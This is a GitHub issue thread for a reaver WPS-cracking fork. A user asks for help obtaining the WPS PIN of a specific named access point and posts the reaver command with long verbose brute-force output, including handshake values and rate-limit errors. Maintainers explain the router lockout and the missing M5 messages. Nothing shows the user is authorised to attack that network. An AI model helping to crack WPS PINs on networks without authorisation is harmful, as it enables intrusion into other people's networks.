t6x/reaver-wps-fork-t6x #45: Pin not found

5485, 2015-12-30:
Plz Help me To get WPS pin of 

B8:A3:86:E7:D8:F0

WPS Manufacturer: Ayecom
* WPS Model Name: AyecomWAP
* WPS Model Number: DSL2740
* Access Point Serial Number: 12345
I have a problem with AP limit and lock wps state . I try to use mdk3 but not work......Pixiewps = pin not found

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

* Switching mon0 to channel 6
[-] Failed to retrieve a MAC address for interface 'mon0'!

root@bt:~/reaver-wps-fork-t6x/src# 
root@bt:~/reaver-wps-fork-t6x/src# reaver -i mon0 -b B8:A3:86:E7:D8:F0 -vvv -c6

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

* Switching mon0 to channel 6
[?] Restore previous session for B8:A3:86:E7:D8:F0? [n/Y] y
*
p1_index set to 0
* p2_index set to 56
* 
Restored previous session
* Waiting for beacon from B8:A3:86:E7:D8:F0
* 
Associated with B8:A3:86:E7:D8:F0 (ESSID: silver600)
* Starting Cracking Session. Pin count: 10056, Max pin attempts: 11000
*
Trying pin 43210473.
* Sending EAPOL START request
* 
Received identity request
* 
Sending identity response
* Received identity request
*
Sending identity response

* E-Nonce: d8:e2:2b:16:95:82:22:fe:0f:72:3b:de:4a:7f:4f:85

* PKE: 9d:e1:f8:11:cb:12:f8:94:ce:48:c8:db:8f:d2:87:b3:ba:71:6c:d8:f8:47:b0:93:1e:97:e9:0b:b2:c4:85:a5:e9:d5:d2:92:f0:e2:07:1d:c4:88:0d:d4:18:d9:0a:30:b5:ef:75:ca:88:24:e3:62:df:d3:61:68:99:70:43:29:dd:26:5b:70:79:d3:78:52:26:4f:7d:2f:fd:8c:6c:7d:0c:14:4a:16:f5:10:03:de:02:6f:16:3e:91:4a:f8:93:83:f7:38:ea:d9:ee:c7:73:0e:fe:5e:30:e4:e1:90:81:b2:6f:79:59:e5:3c:b9:01:ce:b9:a2:82:a0:51:46:1d:40:f7:f1:38:c7:08:fd:5e:d1:e4:fa:ef:1e:eb:47:ee:9d:cb:61:b9:64:06:ee:ca:89:e0:12:e6:d4:8d:50:12:1b:2a:68:57:5b:8b:fb:5d:dd:29:24:bc:b9:9b:ba:37:75:87:34:cc:a5:4f:9c:3f:54:77:6e:b1:e4:78:ba:91

* WPS Manufacturer: Ayecom
* WPS Model Name: AyecomWAP

* WPS Model Number: DSL2740

* Access Point Serial Number: 12345

* Received M1 message

* R-Nonce: 30:af:69:83:8e:0e:29:da:a6:96:fa:c1:31:4b:9d:55

* PKR: 10:47:6d:66:23:bd:1d:77:af:5e:a8:e2:93:b0:0c:c1:0d:e6:6a:6e:87:7a:e0:b3:12:08:dc:b4:d9:44:86:06:01:26:11:7a:16:d3:06:45:cd:6d:d4:6a:72:70:81:85:9b:2a:40:d3:ef:b8:c9:ab:16:3e:ae:6e:8e:8b:cd:44:90:ec:52:58:46:f4:0b:2a:b4:f8:32:83:68:4c:03:ea:5c:40:4a:a7:d3:e0:43:3e:9e:95:fa:cf:88:57:74:be:36:f4:7e:ad:c2:15:ae:cc:54:43:f8:67:ec:f4:0c:06:60:ed:db:61:86:37:71:af:16:ab:e8:49:08:df:a8:7d:b5:af:d4:b6:f4:18:a5:aa:00:99:89:46:a1:61:75:fb:0d:0c:fe:22:7b:96:2b:f6:be:3a:d9:75:87:b6:d3:31:0f:d3:09:12:58:76:47:2a:d0:13:7d:70:51:c5:d2:c7:59:2d:eb:85:d6:b3:a0:25:43:43:83:da:76:fc:71:13

* AuthKey: f1:ee:54:6b:46:f0:32:9b:d4:15:d4:4c:dd:2b:23:0a:d0:13:c7:1b:d9:a0:16:c2:9e:c0:4d:18:fa:91:0f:5c

* Sending M2 message

* E-Hash1: 7b:ce:34:ce:52:3f:cd:01:96:c9:08:2e:d1:63:a0:2c:56:c6:75:40:ed:22:10:22:d5:e1:11:b7:a1:b6:bc:92

* E-Hash2: 3b:3e:d3:51:2a:98:3c:98:3c:d8:91:b4:05:76:17:a0:5e:52:9d:85:06:49:a7:c7:9c:85:6d:d4:55:68:bf:0a
[... 520 lines cut ...]
* Sending identity response

* Received identity request

* Sending identity response

* Received identity request

* Sending identity response

* Received identity request

* Sending identity response

[!] EAP_FAILURE: TERMINATE

* Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

^C
* Session saved.
root@bt:~/reaver-wps-fork-t6x/src#

soxrok2212, 2015-12-30:
The router locked out and this can not be avoided in most cases.

closed 2015-12-30 by soxrok2212

casab, 2016-01-09:
And you are not receiving M5 messages. First 4 pins are not correct yet reaver is trying pins for p2.